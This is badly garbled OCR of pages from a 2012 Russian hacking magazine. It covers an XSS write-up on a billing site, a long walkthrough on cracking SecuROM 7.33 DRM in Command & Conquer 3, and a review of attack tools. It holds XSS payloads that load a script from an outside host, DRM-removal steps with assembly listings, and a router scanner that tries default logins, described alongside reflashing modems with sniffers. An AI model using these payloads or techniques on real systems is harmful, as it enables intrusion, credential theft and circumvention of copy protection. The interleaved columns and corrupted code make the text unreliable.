• / client .php? xj xfun=saveTel&x j xargs [)=eeeeeeeeeeee cscript src•"http:// ** */o.js " type• "text/javascript" > </ script> • / client .php? xj xfu n=saveSMSTel&xjxargs [)=eeeeeeeeeeee cscript src• "http: //* **/o.js" type• "text /ja vascript" > </ script>
_S ERVERiREQUE S T_ Щ.IE 1
РНР
~
ISteeiGevfXa]
02
•
'
Llcense
+ д*""'"'
~т·~
Пркв11Т,Оаеtеn 8 Гл.аона11
Р
Снова все успешно! Видимо, разработчики не рассчитывали на
Фаitлы
то , что кто-то допишет их код. Здесь следует учесть, ч т о макси -._·•to~.
мальная длина кода, который возвращался на страни ц е, составля
··•-·• .,.., ... . ., ..
ла
260
символов, так что три уязвимых поля были весьма кстати .
подводя итоги Уже nозже от сотрудников !Т-отдела я уз н ал, что некоторые фай лы с айта не редактировались с
2008
года. Убогий код с огромным
количеством уязвимастей остался как наследие от работавших ранее программ истов.
Как такой биллинг работал в течение долгого времени, я пред
ставляю с трудом. Но теnерь еще больше уверен, что детские уязвимости в виде полного отсутст вия nользовательского кода встречаются повсеместно, даже если речь идет о серьезных комnаниях , которые имеют дело с личными данными пользова
телей и их денежными средствами. К счас ть ю, текущая коман да nрограммистов быстро исправила все ошибки на сайте. :Х: Отображаем п роизвольные страницы через активную
ХАКЕР
XSS
067
04/159/20 12
www.epidemz.net
elf licq: 77191161 cj licq: 37083071
взлом
Если ассоциировать SecuROM
v7.33 .17 с танком Абрамсом без динамической защиты,
OllyDbg
-с гранатометом РПГ-7, а
X-
code injection- с кумулятивной гранатой для гранатомета, то, как и в реальности,
такой выстрел навзничь
ВНЕДРЕНИЕ Х-КОДА
И ВИРТУАЛЬНАЯ МАШИНА: ТЕОРИЯ И ПРАКТИКА ВВЕДЕНИЕ
Ищи на диск е :
•
Полную
версию данного исследования;
• SecuROM 7 Profiler v1 .0; Материалы по работе SecuROM
•
7
&VM ; • Исходники X- code
injection lt x t-Ьinl ; • Видео «X-code injection в действии! »
на сумасшедшую «популярность»
Secu ROM
во
прошьет броню этой тяжелой
Стратегия Tibeгium Waгs до сих пор явля-
всем мире, в нашей стране редко когда можно
неповоротливой машины
ется одной из самых популярных игр се рии
услыша т ь о нем публично [ exelab.гu в расчет не
и достигнет поставленной цели
-
ОЕР. Выведенную из строя
машину изучают Российс кие инженеры
...
Commaпd
& Сопquег
от н ебезызвестной
ко н торы E lectгoпic Aгts. Последняя лояльно относится к Sопу
берем!. В первую очередь это объясняется на личием своего звездного протектора, но если
Sопу после н ескольких судебных ра збира
Digital Audio Di sc Согрогаtiоп [SONY DADCI, чью мать вспоминают, когда очередная игрушка, запротекченная SecuROM,
тельств отказалась от услуг нулевого кольца,
просит вставить оригинальный диск. Несмотря
пользоваться низкоуровневыми функциями,
то ребята из Pгotectioп Techпology продолжают
ХАКЕР
068
www.epidemz.net
04/159/2012
Тибе р иум н ый реверс ин г
пр ограммах, которые соз д ают н еnрия тн ости их
п родуктам. П рисоедин и ться к процессу тоже
Windows NТ \С u гге ntVe rsi оп\ Wi п d ow5 \Ар р 1п it. Так вот, наша задача- перехватить управ
н ельзя- он просто завершится. Впрочем, эта
ление в нужном месте и по казать адрес воз
г адость действует только н а время проверки
врата, чтобы в нужное время присоединиться
д и ска. Н еnлохо! Для меня т о гда это озна ч ало,
к процессу. П очему я иду таким путем? Как уже
что ближайший месяц О Е Р и рабочий дамп я
было упо м януто выше, вся проблема состоит
точ н о не увижу. Конечно, спустя несколько ме
в том, что разработчики прекрасно осведом
сяцев я не хуже разработчиков знал, что и как
лены о любых программах, которые создают
ра бо т ает в
проблемы их продуктам. Этот факт несложно
SecuROM 7.33.
Причем вся линейка
7.3 х практически идентична, особенно это ка
проверить, прослушав
сается виртуальной машины [самое заметное
в исследуемом протекторе. Механизмы меж
изменение: <5расе
for гепt> в более поздних «You Аге Now Eпteriпg а
FiпdWiпdow
CreateFile,
процесснога взаимодействия- вчерашний
версиях заменено на
день; передовой способ борьбы с наворочен
Re5tricted Агеа>>]. Но сейчас у меня только один
ными защищалками-не п осредственное
отладчик и никакой надежды выйти победи
внедрение в целевой образ защищенной про
телем такого серьезного врага, над созданием
граммы. Обнаружить его на порядок сложнее,
которого трудились весьма не глупые люди.
ведь в этом случае мы используем ресурсы
самого протектора. Д абы противостоять такому
ФИЛОСОФИЯ ВЗЛОМА
На м д а ли зе л е ны й с в е т! Снима е м дамп !
раскладу, прежде всего вводят проверку
Пробить навесную броню и доехать до ОЕР
целостности файла [динамическая защита]. Ту
тупым ковырянием в отладчике- слишком
самую, которая отсутствует в нашем случае [чем
где абсолютным чемпионом по вызову являет
долго и неэффективно. Будем бить в бортl
я, собственно, воспользовался]. Едем дальше.
ся
П ервая дыра в защите не заставила себя
Я уже сказал, что для компиляции
долго искать: я сразу заметил, что протектор
использован
одна арена для битвы- прикладной уровень.
не проверяет целостность всего файла. Ну, не
что и cпc3game.dat откомпилирован тем же ком
И, естественно, они приложили максимум
то чтобы совсем не проверяет, нечто подобное
пилятором. Точка входа выглядит как :
усилий для обеспечения надежной защиты ..
имеется, но вот только идет оно как правер-
KeBugCheckEx. Таким образом у разработчиков осталась
которая была пробита, разобрана и демонти
ка участков и направлена, прежде всего, на
рована:].
выявление программных точек останова [так
004628DA 004628DF
С++
Microsoft
7.0.
CNC3.exe
А ведь очевидно,
CA LL 00478488 JMP 004626FA
называемый <<перекрывающий код>>]. Она мне
WHAT 15 TARGET
никак не мешала, поэтому в практическом
Реально точка входа находится по
Сначала определимся с нашим инструмента
плане это означает, что возможно внедрение
операнду прыжка -
рием. Собственно, понадобится сама игруш-
Х-кода в образ файла статическим путем.
по адресу
ка
Строго говоря, Х-код- это осмысленная со
занимается, и я ее всегда игнорирую. Однако
для снятия дампа-
004626FAh.
004784B8h
Функция
ничем полезным не
Tiberium Wars [с последним патчем 1.9], OllyDbg 1.10 с OllyDmp [собственно как дам пер] и OllyDbg 2.0 без
вокупность байт, внедренных посторонним
в ней мы находим, что она вызывает не
лицом или про г раммой в целевой код процесса
сколько API [GetSystemTimeAsFileTime,
каких-либо плагинов. Несмотря на такой столь
с целью выполнения определенной задачи.
скромный набор, в нашем случае работать можно с одним отладчиком, а основным
оружием будет ассемблерный код. Но прежде
Различают следующие типы:
GetCurreпtProce5sld ... l. Для нас это означает только одно: если в
1. On-line patching . Через WiпAPI Rе а d Р го се 55 М е m о ry/W г i te Р го с ess М е m о г у
GetSystemTimeAsFileTime
внедрить Х-код, который перехватит уnрав ление и покажет нам адрес возврата, то у нас
всего ответим на вопрос, какой исполняе-
читаем/пишем в адресное пространство
мый файл требуется загрузить в отладчик.
процесса. К примеру, таким образом, ставят
в окрестности ОЕР и снять рабочий дамп, при
Переходим в папку с установленной игрой.
флаг регистрации в
условии, что после распаковки стартовый
Первым на глаза попадается безобидный
AsPack
CNC3.exe: судя по точке входа, откомпили рован Microsoft С++ 7.0, стандартные секции .text, .rdata ... Правда, если его запустить, нас
с распаковкой. Однако современные про
И хотя
текторы типа
некоторых значимых WiпAPI, этот список
вежливо попросят вставить оригинальный диск. Извините, имеется только
Tools
Daemon
с образом, поэтому возникает вполне
NtExplorer
под эгидой
2.11с, чтобы не заморачиваться
Themida
не дают доступ в свое
адресное пространство.
2. Offline patching . И ли
статический патчин г.
будет замечательная возможность попасть
код действительно на своем законном мес т е.
SecuRO M 7.33
проверяет пролаги
весьма неполон, плюс сама проверкаидет
только в самом начале. Вот тебе и следую щ ий
Собственно, наш случай, когда ничто не
недочет! Теперь пора собрать нашу куму
мешает nисать прямо в исnолняемый об
лятивную гранату. Место для базирования
нормальное желание развязать четвертую
раз и перехватывать в нем управление.
я выбрал в конце секции
тибериумную драку и, в ко н це концов, о т о
Обнаружить такого <<Wтирлица>> у себя
к сборке- написанию а5m-кода, который
драть проверку диска от nро г раммы. Так как я
в тылу протекторам на порядок сложнее .
самостоятельно выполнит всю работу. Весь
был знаком с предыдущими играми из серии
При необходимости одурачивают защиту,
Сп С, то знал, что
делая оригинальную копию исполняемого
CNC3.exe
играет роль обертки
и прос т о через WiпAPI Create P гocess запускает
файла и через GetCommandline/Get FilePath
нужный файл с расширением .dat [на са м ом
возвращают ссылку на него.
деле обычный
Microsoft Р Е Е Х Е format] с нуж
3. 011-hijacking . С
.e5t
и приступил
ОСНОВНОЕ ''ГЛАВНОЕ" ХРАНИЛИЩЕ
VM
(СПЕЦИФИКАЦИЯ) Г
учетом того, что nри загруз
Xl~AIIHЛHЩE
/1РЕС В
IM
Ni!l
б"'- OI I IO'AHДЬI
JMP
EЛXt fШII
АРГУМf:НТВ JI З •вл·н,J ~АПРОСОВ"'
DЛЛГИ СОСТОЯНИЯ
(EFI)
ными параметрами. Несложно догадаться,
ке образа первыми получают управление
что искомая цель - \Retai1Exe\1.9\cпc3game.
динамические библиотеки, записанные
dat. Грузим в отла д чик упомянутый файл и по секции .securom понимаем, с чем имеем дело. F9 ... Милое окошко с надписью « Н е уд алось
в его таблице импорта [точнее, функция
OЬBl-Pl КЛ
DII Mainl, то мы первыми получаем бразды
В:<ОЛ, В •ХРЛIШJШЩF.
правпения над защитой и успеваем скрыть
запустить требуемый модул ь безопас н ости>>.
себя задолго до работы навесной брони.
ts 0/), В 9ИРТУЛ..7IЬl 1 УЮ МАIШНIУ RUJ-J;лrrr RХОЛ В ~rJIЛRIIOEo: Х1'АНИЛШ111:·'•
8111'1 }.~;JЬJIOJ"O
СПКА
Rl_о:РХУШКЛ С'J' IШЛ {SТЛСК POINTF.H)
2с
.artPm., ~ ~tД.ЕIIНЫЙ I.OCK ВУТ& ВХОД 8 "'XPAIIИJIИПtE Nt2"' 11 OI'fV\_ДJISI XPЛIIIOIHЯ ПРОМЕЖ}"ТОЧНЫХ
ДЛH II hiX
И~ПОЛЬЗУЮТ .,ОСТРОВКИ~ ВО ВРЕМЯ РАБОТЫ
Еще раз его мож н о прочитать, ес л и запустить любой А Р I-шпион, Ргос М оп ... Одним словом,
Напоминаю, что для быстрой загрузки можно
разработчики прекрасно осведомлены о всех
прописаться в HKLM\Software\Micro5oft\
ХАКЕР
04/159/ 2012
Понимание главного хранилища является ключевым для в з лома алгоритмов работы вирт у альной машины
069
www.epidemz.net
взлом
1!Ш3
код состоит из двух частей. Первая доста-
• Ьit. l y/x~i B~f -
вит саму гранату на место: заменит пролог
GetSystemTimeAsFileTime
на безусловный
англоязычная статья
по виртуальной
переход ко второй части. Собственно, в этом случае получаем управление из распаковщи
02906ЕЕВ
ка [определить мес т о которого неслож но, по
029D6EEE 02906EF1 02906EF3 029D6EF5 02906EF8 029D6EFE 029D6F 01 029D6F 03 029D6F05 029D6F08 029D6F ОА 029D6F OD 02906F OF 02906F12 02906F14 029D6F17 02906F19 029D6F1B 029D6F1E 029D6F21 029D6F28 029D6F2A 029D6F2D 029D6F3 О 02906F33 029D6F35 02906F38 029D6F3D
ставив точку останова на секцию .textl и туда же его воЗвратим после того, как переход бу дет установлен. Кстати, первоначально, чтобы
получить доступ на запись в секцию kегпе132.
text [дело было на висте), я офлайн на 2k3 через PeTools устанавливал атрибут Wгite, пересчитывал контрольную сумму ... и ведь работало! Способ весьма дурной, учитывая, что есть WiпAPI ViгtuaiPгotect, но нестандарт
ные подходы иногда тоже на руку. Переходим ко второй части нашего представления.
П ервоечередной задачей здесь является по каз адреса возврата и удержание управления
до прибытия на место отладчика. Я реализо вал свой алгоритм, который переводит
large
integeг в ACSIIZ-cтpoкy [об ltoa я тогда не знал), а задачу показа и удержания управле ния элегантно решил с помощью
MessageBox,
но затем уnравление nередается обратно в
WinAPI.
Впрочем, для показа можно нагло
использовать функционал самого протектора
CгeateThгead с адреса т ом
-
OOF9ADOE,
но это
непроизводительно. Итак, граната собрана, поnробуем! Монтируем мини-дамп. Запускаем игру. Нас интересуют все
MessageBox nосле OODDCE77, 76 В 41404, 7С34207В, 0040А5А Е ... Сто-ооп l П оследний, да ведь вызов идет из секции .text l We need attach nowl Присоединяемсяк процессу альгой 1.10, проверки:
которая с дам nером, и переходим по послед
нему адресу . Невероятно, но мы остановились
практически в ОЕР [точка входа расположена по адресу 0040А2С7). Немноги м позже, когда виртуальная машина [VMI стала более-менее
029D6FЗE
029D6F40 029D6F45 02906F46 029D6F48 029D6F 48 029D6F4E 029D6F51
0343 8870 04 8800 89С2
10 81Е 2 FFOOOOOO 0053 10 89F2 D2CA С1С2 08 D2CA С1С2 08 D2CA С1С 2 08 8А48
AOD NOU NOU 1101) NOU AHD ADD
машине SecuROM 7.30. Я нашел эту
PTR PTR PTR
публикацию ко гад уже завершал исследование , но
тем nриятнее было увидеть , что в целом наши выводы
совпали . Однако в статье структура
~101) ED X, ESI ROR DL,CL ROL EDX, ROR DL,CL ROL EDX, ROR DL,CL ROL EDX, 02СА ROR DL,CL С1С2 08 ROL EDX, 8906 NOU ESI,ED X t•10U ED X,EAX 89С2 С1ЕА 18 SHR ED X, 8 013493 ADD DWORD PTR DS:[EDX•4+EBX] ,ESI 8143 04 08 0000 ADD D\~ORO PTR DS: [Е8Х+4] , 8813 NOU PTR DS: (ЕВХ] ADD 03 53 о с PTR DS: [Е8Х+ОС] С 1ЕО 10 SHL ЕА Х , С1Е8 18 SHR ЕАХ, oocs ADD AL,CL PUSH DWORD PTR DS:[EAX•4+EDX] FF3482 ~101) ЕАХ, 88 01 000000 PUSH ЕВ Х 53 OFA 2 CPUID 25 DF FF FF FF AHD Е АХ, РОР ЕВ Х 58 88С1 NOU CL , AL NOU EAX, DWORD PTR DS:[E8X+OC] 8843 ос D30C24 ROR D\·IORD PTR SS : (E SP] ,CL 010424 ADD D\·IORD PTR SS :( ESP] , EA X РОР ЕА Х 58 FFEO ЕАХ
Оптими з ируя скорость работы вирт уа льн о й машины, в обф у с к ации один из остров к ов!
VM излагается в несколько ином виде , да и некоторы х
аспектов работы
VM
я не увидел .
• Ьit.lylxG9 L ry NoDVD для СпСЗ: Tiberium Wars v1.9. Отличительной
особенностью является пристроенная
в секцию
.mem-
агу вирт у альная
машина . В стать е в з ят в кач е ств е основного
при мера . Новичкам рекоменду е т с я нач а ть с н е го .
SONY DADC решили оставить без
изучена, было сделано еще одно умашоки
рующее открытие [снова просчет команды из SONY DADCI- попасть в О Е Р можно
В итоге не выигрываем ни в размерах дампа,
с ювелирной точнос т ью и nри этом еще более
ни в быстродействии.
безопасным путем. И как вы думаете, что
этому помогло?
SecuRO M v7.33
Viгtual
Machine,
В общей сложности на nолный разбор
чья задача- наоборот защищать от взлом
полтора я поnросту копалея во всем без
щиков, но никак уж не nомогать имl
разбору, пока не «догадался >> начать ис
SECUROM V7 VIRTUAL MACHINE
VM
ушло около двух месяцев, причем первые
MOV DWORD PTR DS: [E BX+0C ],EDX MOV ВУТЕ PTR DS: [E BX+10], 95 MOV DWORD PTR DS:[ EBX+14], EBX MOV DWORD PTR DS:[EBX+lC] ,ESP Код, приведенный выше, с потрохами выдает
следование с самого начала цепочки- и вот
главное хранилище, которое играет ключевую
тут началось ... Сама
роль в
SecuROM v7.3x VM
по
VM.
Разберешься в переменных и вобла
существу не является виртуальной маши
сти хранения nромежуточных данных- считай,
с готовым образом добраться до ОЕР и снять
ной в привычном представлении, никакой
что
дамn- по факту дело нескольких минут,
ас м-код там не эмулируется. Все куда проще:
видно, что по существу здесь все наштамповано
матерых взломщиков это никак не остановит.
по существу nроцедура с двумя аргументами
методом copy/paste. В-третьих, сумасшедшее
Навесная защита бессильна, значит, выход
[LPDWORD и VOIDI и тремя вариантами работы.
количество закономерностей вплоть до исполь
один- сделать максимально неработоспособ
Ну а дальше остается только удивляться.
зования регистров
ным дамп! Следуя этой логике, большинство
Во-первых, чтобы понять, как оно работает,
что один из островков находится без обфускации
не хочет заморачиваться с
Инженеры
Sony DADC
как в воду глядели:
VM
на
90% взломана!
CPU
Во-вторых, стало оче
на островках. А тот факт,
просто внимательно изучи nервый островок
-вообще убило! Единственное, что здесь ре
ее сложную структуру, в ко т орой нереально
[кусок кода от sрin-блокировки до JMP EAXI,
ально доставляет, это RОL-байт lcгypt-bytel, так
разобраться за приемлемое время, и предпо
который, как ни странно, выполняется всегда,
как без знания того, какие точно матоперации
читая дампить всю выделенную виртуальную
и всегда первый.
с ним выnолняют все
VM,
nрописывая
к
VM,
и приваривают ее в виде отдельной сек
REP STOS DWORD PTR ES:[EDI ]
<< MOV Е АХ, 1; CPUID; >> инструкцию «MOV AL, CURRENT_CPUID_K EY_ DELTA_DECODE >> и проделать оное еще 254 раза.
островков виртуальной
автоматизированную ломалкуиснять все за
раз. Собственно, кому хочется пони мать, о чем
ции, предварительно догадавшись вставить
nосле конструкции
255
машины, невозможно построить кулхацкерскую
память, и имеющую, и не имеющую отношение
MOV DWORD PTR DS:[EBX+4],EAX MOV EAX,DWORD PTR SS:[ESP] MOV DWORD PTR DS:[EBX+8],EAX
все-таки идет речь- читайте полный вариант
статьи на диске или на нашем сайте. Следующий
воnрос- реально ли отодрать
VM оттибериума?
ХАКЕР
070
www.epidemz.net
04/159/20 12
Тибериумный реверсинг
Интуиция подсказывает, что более чемl Я уже успел проболтаться, что вариантов работы три.
Начнем с последнего [способ
NQ2], собственно
нумерующихся по мере их появления в за
щищенной программе. Способ
NQ2
полностью
61'1 0111Hif>OЗ
6А 6А
IJ111)0(>()/
U11Dfl ... f)9
0111)11(,[1
:) ..
II110IJM3 111101161 •• 11111)1161 ., IJIIDIIIoLR IJ111Hit>ll
so
IJI!OU(>I 1 1111Dfll'>l n
работы алгоритмами, представленными в виде
111"100611
двух процедур'С двумя аргументами, которые
отрабатывают друг за другом . В первом заносим
любое число [например, 1], второй- ссылка на массив ключей [offset OOB93AFC], которые копи руются в стек
На выходе в ЕАХ получается
VM.
что-то типа закодированного числа [0790А442], которое было передано в первом аргументе.
Если это закодирован н ое число [0790А442] скор мить в первый аргумент алгоритма обратного хода, то на выхо д е в ЕАХ мы получаем ту же
1,
при условии, что массив ключей был одинаков
[offset OO B93AFC]. Короче, имеем две функции,
[ l_yp<i'
capt;Jo" Tl.":><t: lou ...... ,
FE09 .. CO : : p l
0WOMO
PTR
0
O S: ~USEH3 2 .1~ ~~UoxAJ
::~~~~;:::1
UIIDII"IНI
:
O'I OE OFB6 59
07
. А · ~
~:~~:~~~~
~~~~~~~~~
>
~~~~~i~~ 1 01100/22
UI!OH/:.>/1
,.
.. .. ЕО
P US H 1\iAX ..1111' S lttllll
118
00
01 IOun;•o 1)1 1011/?1
>
1 01100/21 (JI11)1J.f:JOol n11D07:19I 1!111>11/:111'
68
lt1101J 72.,
Hl}f' но о С2071001
PU S H 1.11 t0117C :.> PUS H AO
Enx ,E:nx
33СО
хон
АО
Е806 1001
ОЕ
ЕОО6100 1
::~~ :~i ~~~~ 0 =~~ 0 0 S: 0.10B6Цt_J
8F
00891 001
85 81
I IOU
EO I
, IJ"II OB91НJ
зu
~~~: ~~~ , ЕСХ
30
1-IDU
CL.,
XO R
I!OX
33С9
U110D/ЗO
,ЕОХ
lti!OU.f:JI
1111DJI/Iol
~ :·tP s ~~R~ L. o ·t10U 76 6
01100/'o:J 1111011/ ...,
"
U S ER3 2. 11 e!<!1 Age80XA
00
EUB61 001 3 1 00 0 00000 IJUUUUUOU 00 000000
:~~~~~~: [ ~
Ul 100/"7 111108/>on
HUL L HUL.L.
ЕВ
01100111
~: ~~~~~~
:~~ н En X PU S H PU S H
nз
U111)U6Гa
завязан с двумя противоположными по логике
PU $ H
UD (Ht
~~1 5
UI11)0(>0A
, " 11>1161 о
IШ_UK jiiU_ I CO H RSfER 1 SK jiii.I_DEFI:IUTTOH1 jiiO_RP I 'LIIUUAL
.. 0
:~
01 !0060 .. 11110Jit>0'•
~ ::~ ~ ~~HI
>
'.' ' ~
n ••r:
SecuROM v7.33 .017
~ IIOHl
111"1 001"1 011QU I .. I
и не пр е дставляет, какими серьезными последствиями гро з ит внедренный Х-код
дающие в сумме нулевой эффект. Собственно, роль
VM
в них такова: в первом случае крышуют
ся асм-инструкции
MOV MOV MOV AND MOV
GetModuleFileNameA, DeleteFileA, GlobaiFгee. Обращение к VM в этом случае всегда ознаме новывается CALL ЕА Х, информация черпается
43 Е 2АВ9 0] упрятанные данные. Наиболее эффективное решение.
ЕАХ,
DWDRD PTR 55: [ЕВР+8) DWORD PTR D5 : [ECX) DWORD PTR 55: [ ЕВР+0С)
десятка вызовов- смело выдираем и ставим
ЕАХ,
ЕСХ
нормальные вызовы
ЕСХ,
ЕАХ
блемным является самый первый способ [по
В остальных случаях все обходится прямым
причине сумасшедшего количества вызовов
вызовом
ЕСХ,
ЕСХ,
Во втором- инструкция
NOP
по известным смещениям в таблице импор-
та. В общей сумме в дампе набралось около
в перенос н ом
смысле. Прич ем прийти к этому выводу можно и без вскрытия
VM,
просто сравнив две упомя
нутые процедуры [обратного и прямого хода]. Следующие в списке способы-
NQ1A
и
NQ1.
Они похожи, но с той лишь разницей , что первый после выхо да из в запрашиваемую
VM переносит нас WinAPI, а второй - в за
прашиваемую внутреннюю функцию [к слову,
около
1.
WinAPI.
Наиболее про
1Ok]. Тут два варианта:
VM
без второго зле мента в ц епочке.
Суть в том, что инструкция
но требуется перетыкать все возможные
железнодорожной стрелки. П ервый раз, когда
меню, да и вообще пройти чуть ли не всю
вызывается внутренняя функция, <<стрелка>> пе
игру. В отличие от <<Косынки>> и <<Пасьянса>>
реведена на
- верный способ убить время с пользойl
происходит заправка упомянутых выше двух ар
2. Зная структуру всех 255 островков [на самом деле в способе NQl участвуют около 50], по сигна т уре базы запросов написать на С++ программу, которая ищет все базы за просов , затем строит всю цепь работы
Скрытых
VM
полный список: SetUnhaпdled E xceptionFilteг,
PTR ОS:[перемещаемый адрес] -7 база за -7 JMP [VM_VIR TUAL_ADDR ESS] -7 VM.
проса
JMP DWORD PTR ОS:[перемещаемый адрес] играет роль
всего- операция с резервированием стека]. не так уж и много, вот не
NQl является пере VM: CALL ANY_OFFS ET -7 JMP DWORD
Дампить. Прос тая техническая реализация,
это может быть о дна асм-инструкция, чаще
WinAPI
Особенностью способа ход к
и в нужном месте виртуального стека
вытаскивает и дешифрует [XOR SecгetDATA,
VM, а
точнее- в базу запросов, где
гументов для виртуальной машины [LP DWORD и VOIO]. В процессеработы VM извлекает адрес запрашиваемой функции и ставит его как перемещаемый адрес- стрелк а переведена! После выхода из
VM происходит
переход в нашу
запрашивае мую функцию, ну а после первого вызова все, кто будет ее вызывать, попадают сразу куда нужно. Как видишь, оп тими зация! Кстати, количество и н струкций, которые выполняются за один прогон виртуальной ма шиной в способах Зk, зато способ
NQl и NQ1A, колеблется около NQ2 бьет все рекорды- ЗОk.
При чем островок без обфускации принадлежит именно последнему с п особу. Финишная работа с дампом включает перестроение в нормальный вид секции кода, удаление ненуж н ых и посто
ронних внедрений типа
0044F4D2 0044F4D8 00482DE5 00482DEF
DEC DWORD PTR D5 : [158297A ) JE NODVD. 00482DE5 MOV DWORD PTR D5: [158297A ), 18D JMP NODVD. 0044F4DE
Последним пунктом отсылаем дамп в Sопу
DAOC.
На этом тибериумная драка заканчива
ется.
ЗАКЛЮЧЕНИЕ В заклю чени е я просто поблагодарю
DADC
SO NY
за ее действительно интересный про
дукт [для хакеров в частности ] ! Д о встречи на ОЕР на горизонте!
ХАКЕР
VM
под контролем
страницах][. ::Х::
xD
071
04/159/2012
www.epidemz.net
взлом
СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ
Ав т ор :
__ ---· ------__ --... -----
slider URL: bit.ly/yMgi86
__
............
,, ....
Сист ема :
"nix/win
"'
,...••'--"'.J
ADSL-POYTEPOB BVSCANNER
Автор :
garinn URL: ripper.zuB.ru
The SX Team URL: bit.ly/htBkrs
Система :
Сист е м а:
Windows
Windows
.."."..
~-
МАСС-ХЕК ВМЕСТЕ С
Автор:
....
=
.......
'
ЛЕГКИЙ ПОИСК И РАСКРУТКА
ВОССТАНАВЛИВАЕМ ПАРОЛИ ОТ БРАУЗЕРОВ
SQL- ИНЪЕКЦИЙ
BVScanneг [Biack Vlastelin Scanneгl - это
П рограмма SQLRippeг- зто продвинутый
маленький, но крайне интересн ый скрипт
и удобный инструмент, предоставляющий
все свои [или не совсем свои
на Регl'е. Он nозволяет с ка нить за д анные
мощные, гибкие и очень простые в исполь
сер вис ов. Эти парали ты предварительно на
диапазоны адресов н а nредмет наличия
зовании функции для поиска и анализа
протяжении долгого времени сохранял в своем
в них ADSL-poyтepoв . В nроцессе скана nрога
SQL-инъекций на осно ве БД
б раузер е. Каким же образо м их добыть? Конеч
MySQL
и
Представь такую ситуа цию: внезапно ты забыл
MSSQL.
парали от веб
но, можно погуглить и най т и множ ество раз
nробует войти в обнаруженные раутеры с nо мощью дефолтных лагинов и па ролей. Если
:1
Возможности nрограммы :
личных утилит непонятного происхождения,
но есть способ лучше ' П редставляю теб е за
вход удался, то все найденные у ч етные записи
поиск относительных и абсолютных ссылок
выводятся на экран и записываются в файл
на страницах;
мечательный софт под си мволичным на з вани
accounts.txt.
задание максимального количества найден
е м Вго wsег Pa sswoгd Dе сгурtог. Данная прога
ных ссылок на странице;
может легко и просто восстанавл ив ат ь па ро ли
Заnуск скриnта крайне тривиален:
проверканайденных ссылок на SQL-ошибки;
и з следующих браузеров: Fiг e fox, lп tе гп еt
perl bvscan ner.pl
определение количества п олей в S ЕLЕ С Т
Ехрlогег,
> П ервый
IР - диа п азо н
запросе с помощью операторов
О ре га Вг оwsег,
>В тор ой
I Р - диапа зо н
ORDER
ВУ,
Google Chгome, Google Chгome Сапагу, Apple Safaгi, Flock Вг оwsе г.
GROUP ВУ. UN ION SEL ECT; точное определен ие п олей вывода;
Возможности и особенности софтины :
возможность замены пробелов и коммента
commaпd-liпe и GUI -ин терфейсы в комплекте;
поточным, за очень короткое время можно
риев на аналоги в случае наличия
восстановлен и е па ролей любой длины
легко получить просто огромное количество
сохране ние промежуточных результатов
и с л ожности;
аккаунтов. В результате успеш н ого ска н а
парсинга в файл
ав т оматическийпо и с квсех подд ерживае
и получения доступа к учетке злоумышленник
чтение струк туры базы данных и ее со хран е
мых браузеров;
может сделать следующее :
ниевХМ L-файл;
функционал сортировки и редактирования
• Кстати, так как сканер является много
IDS;
.dbl;
изменить параметры учетной записи и ли
вы грузка произвольной таблицы и сох ран е
найденных па р олей;
настройки модема;
ни е ее в
сох р анение результатов в HTM L/X ML/Text;
.dbl.
программа представлена в РогtаЫе
продолжить целевую атаку внутри сети;
Хотя программа и обладает интуитивно
создать
п онятным интерфейсом, но тем не мен ее
варианте, что исключает необходимость ее
п редлагаю тебе просмотреть обучающий ролик
установки.
PPTP-V PN
на модеме, п одключ и ться
к нему и снифать трафик в открытом виде; перепрошить модем, предварительно
[bit .ly/ydHA2o ] с описанием основных ее фич,
Пример использования утилиты из команд
внедрив в образ разный ядовитый соф т,
а также с л едить за всеми обновлениями на
например, те же самые сниферы .
официальной странице утилиты.
ной с троки: Brow serPasswordDe cry ptor .exe <output_fil e path>.
ХАКЕР
072
www.epidemz.net
04/159/ 2012
X-Tools
Автор :
[;;] С=\ Windows \system32 \cmd.exe С : ' tools >PindDorr~ain s .ехе http:// 216.239.59.104 http://gfe - gu . google.com http: / /\·1\·m .google. сот l1ttp:/ /<·l<m .google. de http://google.fr http:/ /googlea>•t}l.de http://google.it http://google.e s http: //google.de http: // www.google.co.uk
\·1\·1\·1 -
google. со1Т1
Mesut Timur URL: code.google.co m/p/ finddomains
Find Doma ins- это nолезнейшая
димо получить идентификатор Bing
Сист е ма:
вещь д ля пентестеров. Данная прога
Developeгs. Сделать это можно тут:
*nix/win
пр едстав л яет из себя многопоточный ный для раскрытия доменных имен,
binged.it/6Acg5 , а nолученный ID н еобхо дим о в ставить в файл appid . txt, находящийся в корне папки про
сайтов и виртуальных хостов, кото
граммы.
рые могут быть расположены как на
Некоторыеособенности утилиты :
поисковый механизм, nредназначен
l1ttp: / /\·H·H·J.google .e s http://www.ene~gyho s ting.nl
http: / /t·l\·1\·l.google. по
http://bite - network.com http://!-l\·m. m pЗ - do<-mload s .
ПОИСК СОСЕДЕЙ САЙТА ВМЕСТЕ С FINDDOMAINS
tu
одном, так и на соседних IР-адресах
работае т с nервой 1000 результа
!это расширит список потенциаль-
тов поиска Bing;
но уязвимых мест жертвы). Так как
помимо Б инга получает доменные
http://www.google.cz http://www.google.co.za http://google .lt http: //google. s k http: //google .g>•
FindDomains работает в консоли, ты
имена с п омощью DNS;
легко сможешь встроить ее в свою
работает в многопоточном режиме;
пен т естерскую автоматизированную
прекрасно работает с Mono.
http: // www.google.f~
систему .
J1ttp : / /!-1!-1\·l.google .n 1
Утилита использует движок Bing'a,
П ользоваться утилитой очень просто:
поэт ому для работы будет необхо-
FindDomains.exe www.goog l e.com
l1ttp :/ /\-J\·1\·I.google .coA.Lta ltttn:/ /esb .iet"a. huet"нae. dk
. f.l<tfJIM 8 иuttl10i
1"'•1
8 «:-<ttllN
(N t l
Ав тор :
Ав т ор:
Автор :
Anton Kek s UR L: angry ip.o rg
The SX Team URL: bit. ly/ihELsw
sЗmyOn
Си сте м а:
Сист е ма :
С и сте м а :
' nix/win/mac
Win dows
"'nix/win
URL: b it . l y/w87Yuд
8 иJ•ttJtt7 8 иuttl101
...... ~ICttot ...
<""'
8 ffJ<t"1"
Иmо
• •• , . ,flllf 8 "и'flll}
1"'•1
• ·•1•tti11J
""'"
.о ... ,
8 ftJ<ItfiiH
!No\
!IU't!
6 ANGRY IP SCANNER- СЕТИ
ПОД
ИЩЕМ АНОМАЛИИ В РЕ-ФАЙЛАХ
КОНТРОЛЕМ
ЮЗАЕМ БАЗУ
EXPLOIT-DB.COM
ИЗ КОМАНДНОЙ СТРОКИ
Для усложнения задачи реверсера различные Если твоя повседневная работа связана
